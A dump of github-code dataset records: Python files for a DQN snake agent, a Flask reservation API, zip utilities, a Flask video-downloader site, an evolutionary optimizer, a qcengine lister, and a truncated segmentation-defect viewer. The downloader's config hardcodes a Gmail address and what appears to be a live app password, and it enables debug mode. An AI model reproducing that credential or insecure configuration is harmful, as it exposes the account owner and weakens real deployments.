0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 59, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 71, "usage_type": "call"}]}
+{"seq_id": "30238175104", "text": "import random\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Dict\n\nimport torch\nfrom torch import Tensor\nfrom torch.nn import functional\nfrom torch.optim import Adam\n\nfrom snake.environment.environment import State, Action\nfrom snake.environment.event import Events\nfrom snake.environment.direction import Direction, direction_to_index\nfrom snake.agent.exploration import EpsilonExploration, ExplorationMode\nfrom snake.agent.model import DQN\nfrom snake.agent.replay import ExperienceBatch\nfrom snake.settings import HyperParameters, DEVICE\n\n\nclass Agent(ABC):\n\n @abstractmethod\n def act(self, state: State, **kwargs: Any) -> Action:\n raise NotImplementedError()\n\n\nclass RandomAgent(Agent):\n\n def act(self, state: State, **kwargs: Any) -> Action:\n index = random.randint(0, len(Direction) - 1)\n return Action.from_index(index)\n\n\nclass HumanAgent(Agent):\n\n def act(self, state: State, **kwargs: Any) -> Action:\n events = kwargs.get('events', Events(direction=Direction.UP))\n index = direction_to_index[events.direction]\n return Action.from_index(index)\n\n\nclass NeuralAgent(Agent):\n\n def __init__(self, model: DQN, parameters: HyperParameters) -> None:\n self.policy_network = model.to(DEVICE)\n self.target_network = DQN(model.in_channels, model.out_features).to(DEVICE)\n self.optimizer = Adam(self.policy_network.parameters(), lr=parameters.learning_rate)\n self.exploration = EpsilonExploration(model, parameters)\n self.parameters = parameters\n self.update_target_network()\n\n @torch.no_grad()\n def act(self, state: State, **kwargs: Any) -> Action:\n return self.exploration.sample(state)\n\n @torch.no_grad()\n def compute_targets(self, batch: ExperienceBatch) -> Tensor:\n values = self.policy_network(batch.next_states)\n actions = torch.max(values, dim=1).indices\n\n maximums = self.target_network(batch.next_states)\n maximums = maximums.gather(1, actions.view(-1, 1))\n maximums = maximums.squeeze()\n\n return batch.rewards + (1 - batch.done) * self.parameters.gamma * maximums\n\n def update(self, batch: ExperienceBatch) -> Tensor:\n targets = self.compute_targets(batch)\n\n predictions = self.policy_network(batch.states)\n predictions = predictions.gather(1, batch.actions.view(-1, 1))\n predictions = predictions.squeeze()\n\n # Correct the PER sampling bias\n losses = functional.smooth_l1_loss(predictions, targets, reduction='none')\n loss = torch.mean(batch.weights * losses)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return losses.detach()\n\n def update_target_network(self) -> None:\n self.target_network.load_state_dict(self.policy_network.state_dict())\n\n def train(self) -> None:\n self.policy_network.train()\n self.target_network.train()\n self.exploration.mode = ExplorationMode.TRAIN\n\n def eval(self) -> None:\n self.policy_network.eval()\n self.target_network.eval()\n self.exploration.mode = ExplorationMode.EVAL\n\n def checkpoint(self) -> Dict[str, Any]:\n return {\n 'policy_network_state': self.policy_network.state_dict(),\n 'target_network_state': self.target_network.state_dict(),\n 'optimizer_state': self.optimizer.state_dict()\n }\n", "repo_name": "bartoszzuk/snake", "sub_path": "snake/agent/agent.py", "file_name": "agent.py", "file_ext": "py", "file_size_in_byte": 3417, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "abc.ABC", "line_number": 19, "usage_type": "name"}, {"api_name": "snake.environment.environment.State", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 22, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 21, "usage_type": "name"}, {"api_name": "snake.environment.environment.Action", "line_number": 22, "usage_type": "name"}, {"api_name": "snake.environment.environment.State", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 28, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "snake.environment.direction.Direction", "line_number": 29, "usage_type": "argument"}, {"api_name": "snake.environment.environment.Action.from_index", "line_number": 30, "usage_type": "call"}, {"api_name": "snake.environment.environment.Action", "line_number": 30, "usage_type": "name"}, {"api_name": "snake.environment.environment.Action", "line_number": 28, "usage_type": "name"}, {"api_name": "snake.environment.environment.State", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 35, "usage_type": "name"}, {"api_name": "snake.environment.event.Events", "line_number": 36, "usage_type": "call"}, {"api_name": "snake.environment.direction.Direction.UP", "line_number": 36, "usage_type": "attribute"}, {"api_name": "snake.environment.direction.Direction", "line_number": 36, "usage_type": "name"}, {"api_name": "snake.environment.direction.direction_to_index", "line_number": 37, "usage_type": "name"}, {"api_name": "snake.environment.environment.Action.from_index", "line_number": 38, "usage_type": "call"}, {"api_name": "snake.environment.environment.Action", "line_number": 38, "usage_type": "name"}, {"api_name": "snake.environment.environment.Action", "line_number": 35, "usage_type": "name"}, {"api_name": "snake.agent.model.DQN", "line_number": 43, "usage_type": "name"}, {"api_name": "snake.settings.HyperParameters", "line_number": 43, "usage_type": "name"}, {"api_name": "snake.settings.DEVICE", "line_number": 44, "usage_type": "argument"}, {"api_name": "snake.settings.DEVICE", "line_number": 45, "usage_type": "argument"}, {"api_name": "snake.agent.model.DQN", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 46, "usage_type": "call"}, {"api_name": "snake.agent.exploration.EpsilonExploration", "line_number": 47, "usage_type": "call"}, {"api_name": "snake.environment.environment.State", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 51, "usage_type": "call"}, {"api_name": "snake.environment.environment.Action", "line_number": 52, "usage_type": "name"}, {"api_name": "snake.agent.replay.ExperienceBatch", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.max", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 56, "usage_type": "name"}, {"api_name": "snake.agent.replay.ExperienceBatch", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.functional.smooth_l1_loss", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 66, "usage_type": "name"}, {"api_name": "snake.agent.exploration.ExplorationMode.TRAIN", "line_number": 89, "usage_type": "attribute"}, {"api_name": "snake.agent.exploration.ExplorationMode", "line_number": 89, "usage_type": "name"}, {"api_name": "snake.agent.exploration.ExplorationMode.EVAL", "line_number": 94, "usage_type": "attribute"}, {"api_name": "snake.agent.exploration.ExplorationMode", "line_number": 94, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 96, "usage_type": "name"}]}
+{"seq_id": "38862844853", "text": "from flask import Flask , jsonify, render_template , request \nfrom flask_cors import CORS\nfrom permission import login , logout , logup , isUser , getId ,auth\nfrom db import db_sql\n\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route('/',methods=['GET'])\ndef index():\n return ''' Welcome to the SCSTM API '''\n\napp.route('/user/login',methods=['POST'])(login)\n\napp.route('/user/isUser',methods=['POST'])(isUser)\n\napp.route('/user/logout',methods=['POST'])(logout)\n\napp.route('/user/logup',methods=['POST'])(logup)\n\napp.route('/user/getId',methods=['POST'])(getId)\n\n@app.route(\"/api/getReserves\",methods=['POST'])\n@auth.login_required\ndef getReserves():\n username = request.args.get(\"username\")\n\n sql = \"\"\"\n SELECT\n *\n FROM\n reserve\n WHERE\n `userid` = (\n SELECT\n id\n FROM\n user\n WHERE\n `username` = %s\n )\n \"\"\"\n db = db_sql()\n res = db.read_sql(sql,value=(username))\n print(res)\n if res:\n return jsonify({'code':20000,'message': '成功','data':res})\n else:\n return jsonify({'code':20000,'message': '没有预约','data':[]})\n\n@app.route(\"/api/setReserves\",methods=['POST'])\n@auth.login_required\ndef setReserves():\n data = request.get_json(silent=True)\n if not data:\n return jsonify({'code':10000,'message': '数据错误','data':''})\n \n userid = data[\"userid\"]\n time = data[\"time\"]\n person = data[\"person\"]\n part = data[\"part\"]\n desp = data[\"desp\"]\n \n sql = \"\"\"\n INSERT INTO `reserve` (`userid` ,`time`, `person`, `part`, `desp`) VALUES (%s,%s, %s, %s, %s);\n \"\"\"\n db = db_sql()\n db.insert_sql(sql,value=(userid,time,person,part,desp))\n\n return jsonify({'code':20000,'message': '成功','data':\"\"})\n\n@app.route(\"/api/cancelReserves\",methods=['POST'])\n@auth.login_required\ndef cancelReserves():\n id = request.args.get(\"id\")\n\n sql = \"\"\"\n DELETE FROM `reserve` WHERE `id` = %s\n \"\"\"\n db = db_sql()\n res = db.insert_sql(sql,value=(id))\n\n return jsonify({'code':20000,'message': '成功','data':\"\"})\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=9000)\n\n\n ", "repo_name": "dkymore/SCSTM_AppAndServer", "sub_path": "Src/Server/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2150, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 7, "usage_type": "call"}, {"api_name": "permission.login", "line_number": 14, "usage_type": "argument"}, {"api_name": "permission.isUser", "line_number": 16, "usage_type": "argument"}, {"api_name": "permission.logout", "line_number": 18, "usage_type": "argument"}, {"api_name": "permission.logup", "line_number": 20, "usage_type": "argument"}, {"api_name": "permission.getId", "line_number": 22, "usage_type": "argument"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "db.db_sql", "line_number": 44, "usage_type": "call"}, {"api_name": "db.read_sql", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 50, "usage_type": "call"}, {"api_name": "permission.auth.login_required", "line_number": 25, "usage_type": "attribute"}, {"api_name": "permission.auth", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "db.db_sql", "line_number": 68, "usage_type": "call"}, {"api_name": "db.insert_sql", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 71, "usage_type": "call"}, {"api_name": "permission.auth.login_required", "line_number": 53, "usage_type": "attribute"}, {"api_name": "permission.auth", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "db.db_sql", "line_number": 81, "usage_type": "call"}, {"api_name": "db.insert_sql", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 84, "usage_type": "call"}, {"api_name": "permission.auth.login_required", "line_number": 74, "usage_type": "attribute"}, {"api_name": "permission.auth", "line_number": 74, "usage_type": "name"}]}
+{"seq_id": "69992549207", "text": "import os\nimport zipfile\nimport re\n\nfrom shutil import make_archive\n\ndef unzip_specific_file(zip_file_name, *extract_file_name, directory=\"/tmp\"):\n with zipfile.ZipFile(zip_file_name, 'r') as zip_ref:\n for file_name in extract_file_name:\n zip_ref.extract(file_name, directory)\n\n\ndef unzip_specific_folder(zip_file_name, *extract_folder_name, directory=\"/tmp\"):\n with zipfile.ZipFile(zip_file_name) as archive:\n for folder_name in extract_folder_name:\n names_foo = [i for i in archive.namelist() if i.startswith(folder_name)]\n for file in names_foo:\n archive.extract(file, directory)\n\n\ndef match_file_from_name_pattern(zip_file_name, pattern):\n with zipfile.ZipFile(zip_file_name) as archive:\n for info in archive.infolist():\n if re.match(pattern, info.filename):\n return info.filename\n return None\n\ndef zip_folder(source_folder_path, output_zip_filename):\n return make_archive(output_zip_filename, \"zip\", source_folder_path)\n", "repo_name": "aravind-viswanathan/h2oai-mlflow-flavors", "sub_path": "h2o_mlflow_flavors/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "zipfile.ZipFile", "line_number": 8, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 14, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 22, "usage_type": "call"}, {"api_name": "re.match", "line_number": 24, "usage_type": "call"}, {"api_name": "shutil.make_archive", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "38103541249", "text": "from __future__ import unicode_literals\nimport phonenumbers\nfrom flask import Flask, render_template, request, flash, redirect, url_for, session, abort, jsonify, send_file\nimport urllib.request\nfrom forms import Track\nfrom pytube import YouTube\nfrom io import BytesIO\nfrom uuid import uuid4\nimport random, string\nfrom downloader import URLOpenResult, Downloader\nfrom datetime import datetime\nfrom flask_mail import Mail, Message\nfrom bs4 import BeautifulSoup\nfrom phonenumbers import geocoder, timezone, carrier\nimport datetime\nimport os, secrets\nimport time\nimport json\nimport pickle\nimport requests\nimport yt_dlp as youtube_dl\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napp = Flask(__name__)\n\nmail = Mail(app)\n \n\n\n\n\n\napp.config[\"DEBUG\"] = True\n\n\napp.config[\"SQLALCHEMY_POOL_RECYCLE\"] = 299\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SECRET_KEY'] = 'SECRET_KEY'\napp.config['UPLOADED_PHOTOS_DEST'] = os.path.join(basedir, 'static/images')\napp.config['MAIL_SERVER']='smtp.gmail.com'\napp.config['MAIL_PORT'] = 465\napp.config['MAIL_USERNAME'] = 'olamicreas@gmail.com'\napp.config['MAIL_PASSWORD'] = 'rwqdpqnsosdahvjf'\napp.config['MAIL_USE_TLS'] = False\napp.config['MAIL_USE_SSL'] = True\napp.config['MAIL_DEFAULT_SENDER'] = 'olamicreas@gmail.com'\nmail = Mail(app)\n\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef t():\n \n form = Track(request.form)\n d = request.form.get('d')\n \n if request.method == 'POST':\n try:\n\n \n \n #download_path = YouTube(d, use_oauth = True, allow_oauth_cache=True).streams.get_highest_resolution().download()\n \n #fname = download_path.split(\"//\")[-1]\n opt = {'format': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/mp4'}\n with youtube_dl.YoutubeDL(opt) as ydl:\n \n #r = ydl.download([d])\n r = ydl.extract_info(d, download=True)\n fname = ydl.prepare_filename(r)\n \n return send_file(fname, as_attachment=True)\n \n \n #return send_file(fname, as_attachment=True) \n\n \n \n except Exception as e:\n flash(\"Error Downloading\", 'danger')\n print(e)\n \n \n return render_template('tube.html', title='Youtube Video Downloader')\n@app.route('/privacy')\ndef privacy():\n return render_template('privacy.html', title='privacy')\n\n@app.route('/terms-service')\ndef terms():\n return render_template('terms.html', title='terms & service')\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n \n@app.route('/contact', methods=['POST', 'GET'])\ndef con():\n \n if request.method == 'POST':\n flash('SENT', 'success')\n\n return render_template('contact.html', title='contact us')\n\n@app.route('/tk', methods=['POST', 'GET'])\ndef tk():\n \n form = Track(request.form)\n d = request.form.get('d')\n \n if request.method == 'POST':\n try:\n\n \n \n #download_path = YouTube(d, use_oauth = True, allow_oauth_cache=True).streams.get_highest_resolution().download()\n \n #fname = download_path.split(\"//\")[-1]\n opt = {'format': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/mp4'}\n with youtube_dl.YoutubeDL(opt) as ydl:\n \n #r = ydl.download([d])\n r = ydl.extract_info(d, download=True)\n fname = ydl.prepare_filename(r)\n \n return send_file(fname, as_attachment=True)\n \n \n #return send_file(fname, as_attachment=True) \n\n \n \n except Exception as e:\n flash(\"Error Downloading\", 'danger')\n print(e)\n \n \n return render_template('tiktok.html', title='TikTok Downloader')\n@app.route('/fb', methods=['POST', 'GET'])\ndef fb():\n \n form = Track(request.form)\n d = request.form.get('d')\n \n if request.method == 'POST':\n try:\n\n \n \n #download_path = YouTube(d, use_oauth = True, allow_oauth_cache=True).streams.get_highest_resolution().download()\n \n #fname = download_path.split(\"//\")[-1]\n opt = {'format': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/mp4'}\n with youtube_dl.YoutubeDL(opt) as ydl:\n \n #r = ydl.download([d])\n r = ydl.extract_info(d, download=True)\n fname = ydl.prepare_filename(r)\n \n return send_file(fname, as_attachment=True)\n \n \n #return send_file(fname, as_attachment=True) \n\n \n \n except Exception as e:\n flash(\"Error Downloading\", 'danger')\n print(e)\n \n \n return render_template('facebook.html', title='Facebook Downloader')\n\n\n\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "olamicreas/tube", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5079, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.path.abspath", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 24, "usage_type": "call"}, {"api_name": "flask_mail.Mail", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask_mail.Mail", "line_number": 47, "usage_type": "call"}, {"api_name": "forms.Track", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "yt_dlp.YoutubeDL", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 72, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 103, "usage_type": "call"}, {"api_name": "forms.Track", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "yt_dlp.YoutubeDL", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 138, "usage_type": "call"}, {"api_name": "forms.Track", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 142, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 143, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 143, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "yt_dlp.YoutubeDL", "line_number": 154, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 160, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}]}
+{"seq_id": "3361787908", "text": "from datetime import datetime\n\nimport torch\nfrom torch.optim import Adam\n\nfrom beyondGD.data import batch_loader\nfrom beyondGD.utils import dict_max\n\nfrom beyondGD.optimizer.evolution import elitism, mutate, crossover\n\nfrom beyondGD.optimizer.util import (\n evaluate_on_loader,\n accuracy_on_batch,\n get_rnd_entity,\n get_rnd_prob,\n)\n\nfrom beyondGD.utils.type import TT, IterableDataset, Module, DataLoader\n\n\n#\n#\n# -------- gadam -----------\n#\ndef gadam(\n population: dict,\n train_set: IterableDataset,\n dev_set: IterableDataset,\n learning_rate: float = 1e-2,\n learning_prob: float = 0.5,\n mutation_rate: float = 0.02,\n mutation_prob: float = 0.5,\n crossover_prob: float = 0.5,\n selection_size: int = 10,\n epoch_num: int = 200,\n report_rate: int = 10,\n batch_size: int = 32,\n):\n # enable gradients\n torch.set_grad_enabled(True)\n\n # save population size\n population_size: int = len(population)\n\n # load train set as batched loader\n train_loader: DataLoader = batch_loader(\n train_set,\n batch_size=batch_size,\n )\n\n # load dev set as batched loader\n dev_loader: DataLoader = batch_loader(\n dev_set,\n batch_size=batch_size,\n num_workers=0,\n )\n\n # --\n for epoch in range(1, epoch_num + 1):\n time_begin: datetime = datetime.now()\n\n for batch in train_loader:\n\n # --- calculate accuracy on batch\n population: dict = accuracy_on_batch(population, batch)\n\n # --- select by elite\n selection: dict = elitism(population, selection_size)\n\n # delete old population\n population.clear()\n\n # --- fill new population with mutated, crossed entities\n for _ in range(population_size):\n\n # get random players from selection\n entity: Module = get_rnd_entity(selection)\n\n # (optionally) apply adam\n if learning_prob > get_rnd_prob():\n\n # enable dropout\n entity.train(True)\n\n # choose Adam for optimization\n # https://pytorch.org/docs/stable/optim.html#torch.optim.Adam\n optimizer = Adam(\n entity.parameters(),\n lr=learning_rate,\n )\n optimizer.zero_grad()\n\n # compute loss, backward\n loss: TT = entity.loss(batch)\n loss.backward()\n\n # optimize\n optimizer.step()\n\n # reduce memory usage by deleting loss after calculation\n # https://discuss.pytorch.org/t/calling-loss-backward-reduce-memory-usage/2735\n del loss\n\n # (optionally) cross random players\n if crossover_prob > get_rnd_prob():\n entity.train(False)\n entity: Module = crossover(\n entity, get_rnd_entity(selection)\n )\n\n # (optionally) mutate random players\n if mutation_prob > get_rnd_prob():\n entity.train(False)\n entity: Module = mutate(entity, mutation_rate)\n\n # add to next generation\n population[entity] = 0.0\n\n # --- report\n if epoch % report_rate == 0:\n\n # --- evaluate all models on train set\n population: dict = evaluate_on_loader(population, dev_loader)\n\n # --- find best model and corresponding score\n best, dev_score = dict_max(population)\n\n print(\n \"[--- @{:02}: \\t avg(train)={:2.4f} \\t best(train)={:2.4f} \\t best(dev)={:2.4f} \\t time(epoch)={} ---]\".format(\n epoch,\n sum(population.values()) / len(population),\n best.evaluate(train_loader),\n dev_score,\n datetime.now() - time_begin,\n )\n )\n\n return population\n", "repo_name": "smnmnkr/CL-SoSe21--Bachelor-Thesis-Code", "sub_path": "beyondGD/optimizer/gadam.py", "file_name": "gadam.py", "file_ext": "py", "file_size_in_byte": 4083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "beyondGD.utils.type.IterableDataset", "line_number": 27, "usage_type": "name"}, {"api_name": "beyondGD.utils.type.IterableDataset", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.set_grad_enabled", "line_number": 40, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.DataLoader", "line_number": 46, "usage_type": "name"}, {"api_name": "beyondGD.data.batch_loader", "line_number": 46, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.DataLoader", "line_number": 52, "usage_type": "name"}, {"api_name": "beyondGD.data.batch_loader", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 60, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.accuracy_on_batch", "line_number": 65, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.evolution.elitism", "line_number": 68, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.Module", "line_number": 77, "usage_type": "name"}, {"api_name": "beyondGD.optimizer.util.get_rnd_entity", "line_number": 77, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.get_rnd_prob", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 87, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.TT", "line_number": 94, "usage_type": "name"}, {"api_name": "beyondGD.optimizer.util.get_rnd_prob", "line_number": 105, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.Module", "line_number": 107, "usage_type": "name"}, {"api_name": "beyondGD.optimizer.evolution.crossover", "line_number": 107, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.get_rnd_entity", "line_number": 108, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.get_rnd_prob", "line_number": 112, "usage_type": "call"}, {"api_name": "beyondGD.utils.type.Module", "line_number": 114, "usage_type": "name"}, {"api_name": "beyondGD.optimizer.evolution.mutate", "line_number": 114, "usage_type": "call"}, {"api_name": "beyondGD.optimizer.util.evaluate_on_loader", "line_number": 123, "usage_type": "call"}, {"api_name": "beyondGD.utils.dict_max", "line_number": 126, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 134, "usage_type": "name"}]}
+{"seq_id": "13440720261", "text": "import json\n\n# This script returns the programs/procedures available in qcengine\n# as a dictionary of {program: version}\n# It is meant to be used with subprocess to get the available programs\n# in a conda environment\n\nif __name__ == \"__main__\":\n try:\n import qcengine\n\n progs = {x: qcengine.get_program(x).get_version() for x in qcengine.list_available_programs()}\n procs = {x: qcengine.get_procedure(x).get_version() for x in qcengine.list_available_procedures()}\n progs[\"qcengine\"] = qcengine.__version__\n\n except ImportError:\n progs = {}\n procs = {}\n\n print(json.dumps({**progs, **procs}))\n", "repo_name": "MolSSI/QCFractal", "sub_path": "qcfractalcompute/qcfractalcompute/run_scripts/qcengine_list.py", "file_name": "qcengine_list.py", "file_ext": "py", "file_size_in_byte": 644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 134, "dataset": "github-code", "pt": "31", "api": [{"api_name": "qcengine.get_program", "line_number": 12, "usage_type": "call"}, {"api_name": "qcengine.list_available_programs", "line_number": 12, "usage_type": "call"}, {"api_name": "qcengine.get_procedure", "line_number": 13, "usage_type": "call"}, {"api_name": "qcengine.list_available_procedures", "line_number": 13, "usage_type": "call"}, {"api_name": "qcengine.__version__", "line_number": 14, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "13764682357", "text": "import os\nimport cv2\nimport numpy as np\nfrom perception.base.seg_group_files import SegGroupFiles\nfrom view.base.img_view import ImgView\nfrom pathlib import Path\n\n\nclass SegUnlabelDefect(SegGroupFiles):\n def __init__(self):\n super(SegUnlabelDefect, self).__init__()\n self._img_view = ImgView()\n # # 保存地址\n self._defect_pic_pathlist_str = \"\"\n\n def show_defect(self, check_ratio=0.7):\n names = self._get_names()\n self._img_view.init()\n self._img_view.set_scale(0.5)\n idx = 0\n while idx < len(names):\n name = names[idx]\n pairs = self.group_file_map[name]\n image_file = pairs[\"image_file\"]\n img_list = self._read_img(name)\n valid_contours, low_conf_norm_area, hist_ratio = self._get_low_confidence_area(name, check_ratio)\n canvas_img = self._calc_canvas_show(img_list, valid_contours, low_conf_norm_area)\n if canvas_img is None:\n idx += 1\n continue\n\n self._img_view.set_image(canvas_img)\n image_file_text = '/'.join(Path(image_file).parts[-3:])\n self._img_view.show_text(point=None, text=image_file_text, color=(0, 0, 255), font_scale=2)\n\n idx, key = self._img_view.show(delay=0)\n\n def export_defect_list(self, save_dir, save_file_name='badcase', check_ratio=0.7):\n self._find_defect(check_ratio)\n os.makedirs(save_dir, exist_ok=True)\n badcase_file = os.path.join(save_dir, save_file_name + \"_labelme.txt\")\n with open(badcase_file, \"w\") as fid:\n fid.writelines(self._defect_pic_pathlist_str)\n\n def _find_defect(self, check_ratio=0.7):\n names = self._get_names()\n for i, name in enumerate(names):\n valid_contours, low_conf_area, hist_ratio = self._get_low_confidence_area(name, check_ratio)\n if low_conf_area > 800 or hist_ratio >= 0.35:\n value = self.group_file_map[name]\n src_path = value[\"image_file\"]\n self._defect_pic_pathlist_str += src_path + \"\\n\"\n print(src_path)\n\n def _calc_canvas_show(self, img_list, valid_contours, low_conf_norm_area):\n cv2.drawContours(img_list[1], valid_contours, -1, (0, 0, 255), 2)\n cv2.drawContours(img_list[2], valid_contours, -1, (0, 0, 255), 2)\n cv2.putText(img_list[1], \"area: \" + str(int(low_conf_norm_area)), (20, 90), 1, 3, (2, 0, 255), 3)\n\n canvas_img = np.zeros((img_list[1].shape[0] * 2, img_list[1].shape[1] * 2, 3), np.uint8)\n canvas_img[:img_list[1].shape[0], 